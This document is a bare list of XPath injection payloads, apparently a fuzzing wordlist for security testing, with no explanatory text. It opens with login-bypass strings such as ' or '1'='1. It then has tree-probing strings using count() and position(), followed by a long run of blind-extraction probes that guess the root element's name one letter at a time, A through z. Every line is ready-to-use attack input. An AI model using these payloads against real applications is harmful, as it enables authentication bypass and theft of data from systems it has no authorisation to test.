' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/descendant-or-self::node()
']*|
' or position()=1 or '
' or count(/descendant::*)>0 or '
' or count(//*)>0 or '
' or count(/child::*)>0 or '
' or string-length(name(/*[1]))>0 or '
' or contains(name(/*[1]),'A') or '
' or contains(name(/*[1]),'B') or '
' or contains(name(/*[1]),'C') or '
' or contains(name(/*[1]),'D') or '
' or contains(name(/*[1]),'E') or '
' or contains(name(/*[1]),'F') or '
' or contains(name(/*[1]),'G') or '
' or contains(name(/*[1]),'H') or '
' or contains(name(/*[1]),'I') or '
' or contains(name(/*[1]),'J') or '
' or contains(name(/*[1]),'K') or '
' or contains(name(/*[1]),'L') or '
' or contains(name(/*[1]),'M') or '
' or contains(name(/*[1]),'N') or '
' or contains(name(/*[1]),'O') or '
' or contains(name(/*[1]),'P') or '
' or contains(name(/*[1]),'Q') or '
' or contains(name(/*[1]),'R') or '
' or contains(name(/*[1]),'S') or '
' or contains(name(/*[1]),'T') or '
' or contains(name(/*[1]),'U') or '
' or contains(name(/*[1]),'V') or '
' or contains(name(/*[1]),'W') or '
' or contains(name(/*[1]),'X') or '
' or contains(name(/*[1]),'Y') or '
' or contains(name(/*[1]),'Z') or '
' or contains(name(/*[1]),'a') or '
' or contains(name(/*[1]),'b') or '
' or contains(name(/*[1]),'c') or '
' or contains(name(/*[1]),'d') or '
' or contains(name(/*[1]),'e') or '
' or contains(name(/*[1]),'f') or '
' or contains(name(/*[1]),'g') or '
' or contains(name(/*[1]),'h') or '
' or contains(name(/*[1]),'i') or '
' or contains(name(/*[1]),'j') or '
' or contains(name(/*[1]),'k') or '
' or contains(name(/*[1]),'l') or '
' or contains(name(/*[1]),'m') or '
' or contains(name(/*[1]),'n') or '
' or contains(name(/*[1]),'o') or '
' or contains(name(/*[1]),'p') or '
' or contains(name(/*[1]),'q') or '
' or contains(name(/*[1]),'r') or '
' or contains(name(/*[1]),'s') or '
' or contains(name(/*[1]),'t') or '
' or contains(name(/*[1]),'u') or '
' or contains(name(/*[1]),'v') or '
' or contains(name(/*[1]),'w') or '
' or contains(name(/*[1]),'x') or '
' or contains(name(/*[1]),'y') or '
' or contains(name(/*[1]),'z') or '
